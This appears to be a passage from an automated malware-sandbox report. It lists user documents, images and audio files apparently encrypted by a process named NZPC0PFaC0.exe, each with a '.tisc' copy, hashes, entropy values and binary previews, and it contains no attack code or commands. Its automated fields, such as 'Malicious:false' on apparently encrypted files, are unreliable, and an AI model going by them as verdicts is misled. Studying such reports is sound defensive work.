                                                                                    Preview: dpPv..si.!.....Mp@.2t..#,."....I....V.H.w*...(..v...t..Q.A..5....u./...4.......i..D.t.,.d.;CS....sM..A..3.g.0.%&yV.b8.C..$...,.2...A........$.yh._.Z..]......o...O.w.L,....g..2 ..P..5..[9.7k...t.xz.C..VA...K?..}...).P.......f.RB....z..o...Z.z2.c...i.;.r......%..W&.......d-..$`.T{.....kw..G..c..0.V~...%.{.".....2...y.1........<.-..oH1.7.$..{.-.a.A:....&......N.3UY.hqzqQ...^....=....$......A.44.<eM..~...a.... [b;.65U..HU....d...%.......!7.l6.$.....p->.@7\....|.W..._.^w.oRw....J..qM..E...i......Y.t$..A0 .....z....%0Uc.......;zD....H..3...y.Q.T.d].d...z..8..3...I'.Q.ime.(-.8.H$.).g....el........g......>^....$Z...H...-L..aJ..a*............._..H.#o...%.%.O....G.FO[....]1.Y[(.....w.......+.0iV.\..-.+....T....S.|.........u2..Boa.*.J..C...7Q....U...0....N.K^....*.$.Z...-...q.=..{....<2.Vs.I..v.,......%'....C.z}.|r........RQ.l1LRK...`....O!..C....(..o.4...?......k.-K~.^.7.......1W..w.t|............74O.....z1.G. ....z'.v....2A5.....Py...gke..x..j
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8751738660319734
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6zdjUfZkhpDftEDOMkvrcY++AxgGgaKD/wY0xrSqFM4CwPSjghrRpKgbD:KhgkhvikQY++AqoKDTcrSqG49PS0DpnD
                                                                                    MD5:6FA9A21C1C3BF4364D4FC37C47BDBB01
                                                                                    SHA1:E3D7457C3AE510B3AB5631859CF5495DD25CCA12
                                                                                    SHA-256:B89FD0415474F573671E1992F599190F56021B7364FBA5194335F09C7FAC6F50
                                                                                    SHA-512:F4A8B9DE1F70052AD20456D7DB1E04158737C21405AA96198C5BFBCC87C0E0FF24D701E08FE84802AEABB5BD3181998AB709B486C6DD70EB31587D6E3ED05F93
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...k..x...x......H.../.. ?.T...[s...x..ID<Q".&+..`.H....t..K(N.j2P..@.....}.MI#...5.......[z....../.........?..M:.|.&.J...].Z.L.I..y..H.~(.D.bY...$..;.~<..q..t..v.........t]9....n...q@.w>.........[....xS.l..f..K.....a.|r.u.....z.0KA..;%.s.;b.c...y..(......s;.)&I.{A...(.LQP.)...d/p.V.N.Y..Q^.s....A.'.~~.C'...,U..../!.ub./..m.a&....((<...O....t.vj..5.9...e.g...'.Y5..0..\6..s....H.01....O....H.]...?.RD.B....i*F...rl.c..YU..........m..d....8........-L.C....G ,...z*.O..q..............T.:!-..+._....U...>..Z6..|..5.%R?.TaU.n..o..E#7.Fl.&.G....Z....1..Q[.o.t..~&@.'....EmqW.I......C.-/..!E>a....Q.j...{..qm.. s...n..tw@$..Q......$..!o!.!.e...{[.>O.o...vN..5..........c..h#.....q....Q.t.....R..ao...p8...j.C......K.r..`..M.rV.a\"%........FW.......,.vz...BN. Dx.:m+$n..>.CfG.......x...O.u..q..LQ.U...@....a-.........6.....?...+.zr0w.2.F.3..<..;.T.....sA._q)S...|"...5..B..b..a..;..l`..........nE....vWgkZ.;....._Sz..Z.}...3`Mpd.;.......m. .vK
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8751738660319734
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6zdjUfZkhpDftEDOMkvrcY++AxgGgaKD/wY0xrSqFM4CwPSjghrRpKgbD:KhgkhvikQY++AqoKDTcrSqG49PS0DpnD
                                                                                    MD5:6FA9A21C1C3BF4364D4FC37C47BDBB01
                                                                                    SHA1:E3D7457C3AE510B3AB5631859CF5495DD25CCA12
                                                                                    SHA-256:B89FD0415474F573671E1992F599190F56021B7364FBA5194335F09C7FAC6F50
                                                                                    SHA-512:F4A8B9DE1F70052AD20456D7DB1E04158737C21405AA96198C5BFBCC87C0E0FF24D701E08FE84802AEABB5BD3181998AB709B486C6DD70EB31587D6E3ED05F93
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...k..x...x......H.../.. ?.T...[s...x..ID<Q".&+..`.H....t..K(N.j2P..@.....}.MI#...5.......[z....../.........?..M:.|.&.J...].Z.L.I..y..H.~(.D.bY...$..;.~<..q..t..v.........t]9....n...q@.w>.........[....xS.l..f..K.....a.|r.u.....z.0KA..;%.s.;b.c...y..(......s;.)&I.{A...(.LQP.)...d/p.V.N.Y..Q^.s....A.'.~~.C'...,U..../!.ub./..m.a&....((<...O....t.vj..5.9...e.g...'.Y5..0..\6..s....H.01....O....H.]...?.RD.B....i*F...rl.c..YU..........m..d....8........-L.C....G ,...z*.O..q..............T.:!-..+._....U...>..Z6..|..5.%R?.TaU.n..o..E#7.Fl.&.G....Z....1..Q[.o.t..~&@.'....EmqW.I......C.-/..!E>a....Q.j...{..qm.. s...n..tw@$..Q......$..!o!.!.e...{[.>O.o...vN..5..........c..h#.....q....Q.t.....R..ao...p8...j.C......K.r..`..M.rV.a\"%........FW.......,.vz...BN. Dx.:m+$n..>.CfG.......x...O.u..q..LQ.U...@....a-.........6.....?...+.zr0w.2.F.3..<..;.T.....sA._q)S...|"...5..B..b..a..;..l`..........nE....vWgkZ.;....._Sz..Z.}...3`Mpd.;.......m. .vK
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.85719965195428
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:4c6VpueEapSzg0ooUX0Y4rqB28d5YphJGDSAnK69mUxV4GMtdVXPR9gKgbD:J6VjdAghX0Tqj5iJ60OWH/VfYnD
                                                                                    MD5:DC358CF8957869AF53CBC42B24A291C9
                                                                                    SHA1:270C20A79BA0304901510E7DEEB164AD53B817D5
                                                                                    SHA-256:8E379CA207EAF5D41CF8D9FB2E7C4E8374E6375887985786927DCD9E71311D75
                                                                                    SHA-512:CC87B2E8216D29DC549062D7A9C59C49CB41477FAFB2B59803A868C1B0412E12D27C6E4E0A0F22DD54A37CEDBC9856CD5548F389EA6B994ED9E43895960DE8E7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..P..[V.t.........#O.'[C-.ZF...w..E......... o..*.~?Yi...MC.+#....vh>EO...[w....D..!*...eOx..+:.V.~I..<.>g......;....5x.....VJq./...^\^..h.|......u...B..|5<....d`+..+...u...[a.4P=A...x-h.H.v....=&...'y....f.#...i.A.6K.#..M5.{..n......u.0q...|A.p..2S..'..f]..3..i.ka.[..9Zl"......@:9..0.e.t....~AN.)H2..O!FN......m..'....d....>......Z.'.s....;..5.h.+.A".A...CS&.b{..! i.s...g.Q.j......^......?pC.v...h.:N.K.K=..>..>..(.y...5.b4.....q\...Se\..daO.T..Px...pYV.rI..V..J.7`7@._O......0....;.4.z..]..S......&J]..~..d.3....3...{..)X......?.uh.>.W|.~...H.c..\.m.\....[..L..{......'O.;......r.......g5e.Z;..U:..rl!...Y...I9.H.$y".9.I..h.b:....2.xy......C.E..f...X..U...;....s...............~.[^<...+I1.......d..............-..b.?..N....|.v.:<Xv.9...m...%.+.`..W.8.G*.8a.....f;^7..:.86c<..NO..]\..k....t..,l;..t.?!;....4._....-..V............TG..rtq..=.$..P...g..........K..Y...j.`F............d....%.@......n|...@.`....'....."...WY".BM.*...r-..^}8{Y.1
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.85719965195428
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:4c6VpueEapSzg0ooUX0Y4rqB28d5YphJGDSAnK69mUxV4GMtdVXPR9gKgbD:J6VjdAghX0Tqj5iJ60OWH/VfYnD
                                                                                    MD5:DC358CF8957869AF53CBC42B24A291C9
                                                                                    SHA1:270C20A79BA0304901510E7DEEB164AD53B817D5
                                                                                    SHA-256:8E379CA207EAF5D41CF8D9FB2E7C4E8374E6375887985786927DCD9E71311D75
                                                                                    SHA-512:CC87B2E8216D29DC549062D7A9C59C49CB41477FAFB2B59803A868C1B0412E12D27C6E4E0A0F22DD54A37CEDBC9856CD5548F389EA6B994ED9E43895960DE8E7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..P..[V.t.........#O.'[C-.ZF...w..E......... o..*.~?Yi...MC.+#....vh>EO...[w....D..!*...eOx..+:.V.~I..<.>g......;....5x.....VJq./...^\^..h.|......u...B..|5<....d`+..+...u...[a.4P=A...x-h.H.v....=&...'y....f.#...i.A.6K.#..M5.{..n......u.0q...|A.p..2S..'..f]..3..i.ka.[..9Zl"......@:9..0.e.t....~AN.)H2..O!FN......m..'....d....>......Z.'.s....;..5.h.+.A".A...CS&.b{..! i.s...g.Q.j......^......?pC.v...h.:N.K.K=..>..>..(.y...5.b4.....q\...Se\..daO.T..Px...pYV.rI..V..J.7`7@._O......0....;.4.z..]..S......&J]..~..d.3....3...{..)X......?.uh.>.W|.~...H.c..\.m.\....[..L..{......'O.;......r.......g5e.Z;..U:..rl!...Y...I9.H.$y".9.I..h.b:....2.xy......C.E..f...X..U...;....s...............~.[^<...+I1.......d..............-..b.?..N....|.v.:<Xv.9...m...%.+.`..W.8.G*.8a.....f;^7..:.86c<..NO..]\..k....t..,l;..t.?!;....4._....-..V............TG..rtq..=.$..P...g..........K..Y...j.`F............d....%.@......n|...@.`....'....."...WY".BM.*...r-..^}8{Y.1
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849682673878374
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:E3c/4JrPJ0vtTlEMXYV96mbl4yjFFRQ+bMAMFemH2gbD:Uw4ZWvtTdw96wKyRFRQ+UF9TD
                                                                                    MD5:54CB232572B2B478A699D0F5E957488D
                                                                                    SHA1:6BA325866AF5A2767A0F76F181B3769F6A69AA73
                                                                                    SHA-256:3C1E5093A4503D151CDD9E720F7B4B63EA2DE2E7C3071A86489F97D2910BC6FF
                                                                                    SHA-512:B5C10A7A48D19B38D7AC6A974952EB91C2E714DA25C30971F470F8C194703428E2EFC846F1DBE34BF0006A8D1B6AF7A49F18DFD86BE3F970E8333F1A45820E5C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: U...G..cx.j..n.a....O.$.b.^a....k...O_.RyXws.)...H.}...\...@+.0.Z-......O./.Cp..q..W... .3..[.c..6..w..n..Z.,....P....~.3.........=.......!E.....F5y...3_p^T.Z......<.BQS0TO.....UW3.$f.@..$...S..*v....rXd...S.-....%.z.....z.Hp...!.PS..$ I.c.d..p.]...:.I.`......>...?....kN.....p.m...P...2N6...>dX...e.J.......S.U.8z......S.m.t.D....w=.>0..2.w...o.'...J..|.....=..........r..Y. O..Y....U.Y3p.1......~.....6.].....9..T...s........4.?E.V|m..].0...@..W..K.`.W..9 .....Il.\....'..J.}.A.AZ.J.p.>.AI.fG.Y..}.5....6.W.._x...Z.J.._%}}.....-I.w.U...5.nwi..D"{....xs.....R..\....1\....@.W...6.m..lm..2.$K.$...5.....Ve$..h.SO..c..oc...A...V%mxE..mI.....~.s..UB.......A...|..L.Y../..2......*...U.2!..|HJc*.~Bdf..gc..._.\0.c../.r.....$v.....V.....)!-..v....G*..n]u77......\g.....V..qpp...kmV..F9..To.q..........>[..S.u....4X..G..C.,......h.3..@`.{..v...>..F.Y?...:........+~..U.%E..kxGI...C8..8(2.....H.\.UKS.Z.....O_..?...K4`...nz..;...D.....w.Y4<2.@.f..p.0.{
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849682673878374
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:E3c/4JrPJ0vtTlEMXYV96mbl4yjFFRQ+bMAMFemH2gbD:Uw4ZWvtTdw96wKyRFRQ+UF9TD
                                                                                    MD5:54CB232572B2B478A699D0F5E957488D
                                                                                    SHA1:6BA325866AF5A2767A0F76F181B3769F6A69AA73
                                                                                    SHA-256:3C1E5093A4503D151CDD9E720F7B4B63EA2DE2E7C3071A86489F97D2910BC6FF
                                                                                    SHA-512:B5C10A7A48D19B38D7AC6A974952EB91C2E714DA25C30971F470F8C194703428E2EFC846F1DBE34BF0006A8D1B6AF7A49F18DFD86BE3F970E8333F1A45820E5C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: U...G..cx.j..n.a....O.$.b.^a....k...O_.RyXws.)...H.}...\...@+.0.Z-......O./.Cp..q..W... .3..[.c..6..w..n..Z.,....P....~.3.........=.......!E.....F5y...3_p^T.Z......<.BQS0TO.....UW3.$f.@..$...S..*v....rXd...S.-....%.z.....z.Hp...!.PS..$ I.c.d..p.]...:.I.`......>...?....kN.....p.m...P...2N6...>dX...e.J.......S.U.8z......S.m.t.D....w=.>0..2.w...o.'...J..|.....=..........r..Y. O..Y....U.Y3p.1......~.....6.].....9..T...s........4.?E.V|m..].0...@..W..K.`.W..9 .....Il.\....'..J.}.A.AZ.J.p.>.AI.fG.Y..}.5....6.W.._x...Z.J.._%}}.....-I.w.U...5.nwi..D"{....xs.....R..\....1\....@.W...6.m..lm..2.$K.$...5.....Ve$..h.SO..c..oc...A...V%mxE..mI.....~.s..UB.......A...|..L.Y../..2......*...U.2!..|HJc*.~Bdf..gc..._.\0.c../.r.....$v.....V.....)!-..v....G*..n]u77......\g.....V..qpp...kmV..F9..To.q..........>[..S.u....4X..G..C.,......h.3..@`.{..v...>..F.Y?...:........+~..U.%E..kxGI...C8..8(2.....H.\.UKS.Z.....O_..?...K4`...nz..;...D.....w.Y4<2.@.f..p.0.{
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\BNAGMGSPLO.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.860581149888047
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6CYbqOGZjRToaY8DOydRS3/fuG2PzghB+nuBds7HGmQm4Zp8YztAlDJOh2gbD:obqOGZ91zS3/aPMhAnugiRm4XntAFeD
                                                                                    MD5:22844159D1AC51B325DFBDAF3AFA05E3
                                                                                    SHA1:4212EFCFFD22AC2B96DE8E83754BD56AB15DB6E1
                                                                                    SHA-256:86C09CAE24FDBC94A46737F1CDF1678769AAC0114B87E0E8B507A2FB42203B53
                                                                                    SHA-512:788EF1E622587783F71DFC682007A7CE767656EEE1E5F0542696D3C7D0D991D667A9EA2E419FBDB80B55F744ABD6C88E8FF09A609EB950F80D9CE1D5B0064CA5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..kx...Dm...1.5Q_.6.,....a..u.....(.aAs....R.G.....B..<W#u...e...<...2`...K.AD.yV.1..q.C..:..9...V..{.|.~..'......N.3Z...N3T.[C.;..{.0.d...r....z..........\.'.u].0f<..X..T...N.3-..W.4..~.TH.`.Q.PU.6.sn.....X..}4)^....{.{....^.|..Z..*l..J.h_..z"_e........./b.HcF.....b.....9.vl.pp_....$.:..Y3.E.1.y.`5....%(J../ .O..EO.g...x...ur....(...F{(Y3...k+..{[c......U..(...i..m.m..X....n..75..J....vS.I.h.n7....g....F.".......B.e...#.T...7_vU.{.q....$.D.Z.."........y.........(........L.2'.;..UN.a.d.....;...g.en...=b.F{...e@.L...'.I.M.?Q.(l..p...4.\...Y.f%.w..H.3.5b&.....'.S:..&^xg.f9.KcL....k..........H.Z....8..../.r.M..._KAx..$rm?.H.J..3..X.oc....6.....dPH...6wT....1......y...)H..JU........\/.......z.u.....v..7.a.l..r......x^D[.....i.z'.R...>.'....[I..P}.Lq8....EN.A.l...O.;8R.7+.A.]...sp..p.@P..`;..=3...WS...y:IN...6.s.{.|..M.H.w>.)s8.....{8f...d.w.t...I......B8.G..'..Aq.`Y.....l$......5H....>...4..l....G..w=..iv..,`..p.@..Zm.c;#...i.W......D
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\BNAGMGSPLO.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.860581149888047
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6CYbqOGZjRToaY8DOydRS3/fuG2PzghB+nuBds7HGmQm4Zp8YztAlDJOh2gbD:obqOGZ91zS3/aPMhAnugiRm4XntAFeD
                                                                                    MD5:22844159D1AC51B325DFBDAF3AFA05E3
                                                                                    SHA1:4212EFCFFD22AC2B96DE8E83754BD56AB15DB6E1
                                                                                    SHA-256:86C09CAE24FDBC94A46737F1CDF1678769AAC0114B87E0E8B507A2FB42203B53
                                                                                    SHA-512:788EF1E622587783F71DFC682007A7CE767656EEE1E5F0542696D3C7D0D991D667A9EA2E419FBDB80B55F744ABD6C88E8FF09A609EB950F80D9CE1D5B0064CA5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..kx...Dm...1.5Q_.6.,....a..u.....(.aAs....R.G.....B..<W#u...e...<...2`...K.AD.yV.1..q.C..:..9...V..{.|.~..'......N.3Z...N3T.[C.;..{.0.d...r....z..........\.'.u].0f<..X..T...N.3-..W.4..~.TH.`.Q.PU.6.sn.....X..}4)^....{.{....^.|..Z..*l..J.h_..z"_e........./b.HcF.....b.....9.vl.pp_....$.:..Y3.E.1.y.`5....%(J../ .O..EO.g...x...ur....(...F{(Y3...k+..{[c......U..(...i..m.m..X....n..75..J....vS.I.h.n7....g....F.".......B.e...#.T...7_vU.{.q....$.D.Z.."........y.........(........L.2'.;..UN.a.d.....;...g.en...=b.F{...e@.L...'.I.M.?Q.(l..p...4.\...Y.f%.w..H.3.5b&.....'.S:..&^xg.f9.KcL....k..........H.Z....8..../.r.M..._KAx..$rm?.H.J..3..X.oc....6.....dPH...6wT....1......y...)H..JU........\/.......z.u.....v..7.a.l..r......x^D[.....i.z'.R...>.'....[I..P}.Lq8....EN.A.l...O.;8R.7+.A.]...sp..p.@P..`;..=3...WS...y:IN...6.s.{.|..M.H.w>.)s8.....{8f...d.w.t...I......B8.G..'..Aq.`Y.....l$......5H....>...4..l....G..w=..iv..,`..p.@..Zm.c;#...i.W......D
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\PIVFAGEAAV.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.848237581072393
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:yqK+HyX4ntmte3WZt6Nb8QR0UfGYo2vL71x86JtnUVm1Dq0iEKYd3jgbD:yqOQtePC8QRTBnvLlsm1uYKcGD
                                                                                    MD5:48EA06EF69A47380AF0AF4C9A2B8D1FB
                                                                                    SHA1:7DE9443903504E45A63E9C4AB49864E3BD009491
                                                                                    SHA-256:6EE090C12EC9BD31EDA8CEFBF6ADECE4BBE3911603DEDB53009333EBBFF362AC
                                                                                    SHA-512:00F84BCD4803F11E3B1FCBCF70F6AD6FC73B4DB32DE03CAC0EC96BE3AEB98E2B9BE49017443A413AB958F17CAFA334D07F7E951C4AEF1358368FE379B36F3C42
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: I..... }...2.f..bs...bi.......,..M.xg......9..Z?.lY.Y.g.7&S.1......B)...~P5..,...y.......d.V.o....?.}....E"..'...MH.L.q....b7e.....5).W,...Jj.Q.o..>wt..qqzV....z...{ .......D.......l..."X...0....c.......v....m..4|.z1)q...)....E..&d.L..c....H.1.....O.<Y.......!UxS.H.^,.0...........z..4...27...0...E.`e.c.......!..ph.<P.3...h.T...o..r.9.*...;.^^.;...\U...B6.E.L.zdVv>q...Bp.s...-L.?yZ?.n..e.Y/...O......U.c..Z..}.P....N..1r.n....g.G...A.!tw$Z....y.Y8B~......P..Kc..g....m*.A.B...N&76...-#..,4O..%..".7}j.>G..K[...0..L.6.RT...=m.K.K.D.j.......'..W....."3..k]...C..&.T.$.z.$.N.0g.#.V#.v.7..O0^.~.T..O[m.0...M@..z...........N..~`...B....45_.^.4i...D..A...{.....iG.......d<.b8.)FQ.H.6.L...{...!. .}ZV..._.i\....4~.........ty...^..N.Lb.b;...<C...q.....R..\.$8 ..?....dMm.[U....9".o.mLii...~....Y..D..*....q..9........8.......e.F/P..Y.Q..5..D......@.:.....3......i..^.)l...C....>.....kX..v}..j_ 5.E.{I$.Q...$`......a.......<....4.Ry......].'...-...$..c...
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.848237581072393
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:yqK+HyX4ntmte3WZt6Nb8QR0UfGYo2vL71x86JtnUVm1Dq0iEKYd3jgbD:yqOQtePC8QRTBnvLlsm1uYKcGD
                                                                                    MD5:48EA06EF69A47380AF0AF4C9A2B8D1FB
                                                                                    SHA1:7DE9443903504E45A63E9C4AB49864E3BD009491
                                                                                    SHA-256:6EE090C12EC9BD31EDA8CEFBF6ADECE4BBE3911603DEDB53009333EBBFF362AC
                                                                                    SHA-512:00F84BCD4803F11E3B1FCBCF70F6AD6FC73B4DB32DE03CAC0EC96BE3AEB98E2B9BE49017443A413AB958F17CAFA334D07F7E951C4AEF1358368FE379B36F3C42
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: I..... }...2.f..bs...bi.......,..M.xg......9..Z?.lY.Y.g.7&S.1......B)...~P5..,...y.......d.V.o....?.}....E"..'...MH.L.q....b7e.....5).W,...Jj.Q.o..>wt..qqzV....z...{ .......D.......l..."X...0....c.......v....m..4|.z1)q...)....E..&d.L..c....H.1.....O.<Y.......!UxS.H.^,.0...........z..4...27...0...E.`e.c.......!..ph.<P.3...h.T...o..r.9.*...;.^^.;...\U...B6.E.L.zdVv>q...Bp.s...-L.?yZ?.n..e.Y/...O......U.c..Z..}.P....N..1r.n....g.G...A.!tw$Z....y.Y8B~......P..Kc..g....m*.A.B...N&76...-#..,4O..%..".7}j.>G..K[...0..L.6.RT...=m.K.K.D.j.......'..W....."3..k]...C..&.T.$.z.$.N.0g.#.V#.v.7..O0^.~.T..O[m.0...M@..z...........N..~`...B....45_.^.4i...D..A...{.....iG.......d<.b8.)FQ.H.6.L...{...!. .}ZV..._.i\....4~.........ty...^..N.Lb.b;...<C...q.....R..\.$8 ..?....dMm.[U....9".o.mLii...~....Y..D..*....q..9........8.......e.F/P..Y.Q..5..D......@.:.....3......i..^.)l...C....>.....kX..v}..j_ 5.E.{I$.Q...$`......a.......<....4.Ry......].'...-...$..c...
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.855068796023753
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ZBRYpMJdHI/ROEKgbuLfMbOfgu3kgyc+58Rsj96N5e/yKG2lYM5jW5tgbD:ZHYpMAROzeuig+8RsB0e/s2CX50D
                                                                                    MD5:D235DA2BEAB12F57E83EAFCF37667462
                                                                                    SHA1:F553168E32094D52706491EF38BD9B5E662E1C58
                                                                                    SHA-256:0DE3D517ACFAC46EB0D3913478717D19B0FAB0A8301CD90B4F26602368495E14
                                                                                    SHA-512:E138F9B9ED7F70F7B2E38314D4B9786398B82EA49E27DA2295BC0153A2C92DCADB41615159ED73558D4EEEA246DBC6C294B1B826E08C4FAF144D820500C78ADF
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..s...hy...Zu............P.o...(p3.z..C.GBxo......`....U....3.kMvk..?9......L#Z.n)..."5...&J.."..:..H0./...!$x......Qsg.-...0.!.....r.7.+.z?.....l......x..I...z..../....%...."D....:.h.J..hh..t..-........f.7#..&..a..;.....v.}...bfG!s.o.%...E.l.@....(<I........r..E......^.W..t.r.>....E&q..5.8V.y9...;.V.S...w......BY.-... H.5..cT.M....7..65.?....nx..K....;.......?....d.....?r. .Q..Yyb9...~/(.*. .....Ix...Z2.w.....8......w.y>)-..UZ.y..p........9E.....v..*.5.....S.Lq.duh.t>...|N.d-..h.k\.x.,....S.l..*..p.1s...{B...L..R...=..0=.....e_../..:}....d4....... ....o."n...yp..<:)6.hk.h.8s........`.e(.,.S.,|.J.........G...Q.9.j..;.../0..\h.M.goL.,._..Su_.v..........E.a.i..x.w..(...b.nW._........*.&<&..>........T....n.%/.....l....\......']%.|...6....k.P}.~........3(..K..d.`.p8!.Q....|....l.._;B.E......[.........X.-0..fb....OxFul....1$JP......j9....*..j...*H<......_.@..z.J.....p...].....p..2v.b.D>H..twL. D.0...Yq...X..1....0.3.i...:%.....M.....'T.
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.855068796023753
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ZBRYpMJdHI/ROEKgbuLfMbOfgu3kgyc+58Rsj96N5e/yKG2lYM5jW5tgbD:ZHYpMAROzeuig+8RsB0e/s2CX50D
                                                                                    MD5:D235DA2BEAB12F57E83EAFCF37667462
                                                                                    SHA1:F553168E32094D52706491EF38BD9B5E662E1C58
                                                                                    SHA-256:0DE3D517ACFAC46EB0D3913478717D19B0FAB0A8301CD90B4F26602368495E14
                                                                                    SHA-512:E138F9B9ED7F70F7B2E38314D4B9786398B82EA49E27DA2295BC0153A2C92DCADB41615159ED73558D4EEEA246DBC6C294B1B826E08C4FAF144D820500C78ADF
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..s...hy...Zu............P.o...(p3.z..C.GBxo......`....U....3.kMvk..?9......L#Z.n)..."5...&J.."..:..H0./...!$x......Qsg.-...0.!.....r.7.+.z?.....l......x..I...z..../....%...."D....:.h.J..hh..t..-........f.7#..&..a..;.....v.}...bfG!s.o.%...E.l.@....(<I........r..E......^.W..t.r.>....E&q..5.8V.y9...;.V.S...w......BY.-... H.5..cT.M....7..65.?....nx..K....;.......?....d.....?r. .Q..Yyb9...~/(.*. .....Ix...Z2.w.....8......w.y>)-..UZ.y..p........9E.....v..*.5.....S.Lq.duh.t>...|N.d-..h.k\.x.,....S.l..*..p.1s...{B...L..R...=..0=.....e_../..:}....d4....... ....o."n...yp..<:)6.hk.h.8s........`.e(.,.S.,|.J.........G...Q.9.j..;.../0..\h.M.goL.,._..Su_.v..........E.a.i..x.w..(...b.nW._........*.&<&..>........T....n.%/.....l....\......']%.|...6....k.P}.~........3(..K..d.`.p8!.Q....|....l.._;B.E......[.........X.-0..fb....OxFul....1$JP......j9....*..j...*H<......_.@..z.J.....p...].....p..2v.b.D>H..twL. D.0...Yq...X..1....0.3.i...:%.....M.....'T.
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.853419808143101
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:yEnxsX8qH6B65iJyZUDNuP/iGXPR+sLl73nFHlao0z3mvaQOBCwjf//gbD:ynXta64gZUDNuP/igJXRnFFao0z3mSQ7
                                                                                    MD5:04D70E3AFCC3FC9F9218839D766269C6
                                                                                    SHA1:D71EC14144F38F646D7E8E6B1F0C6D23A7B987FD
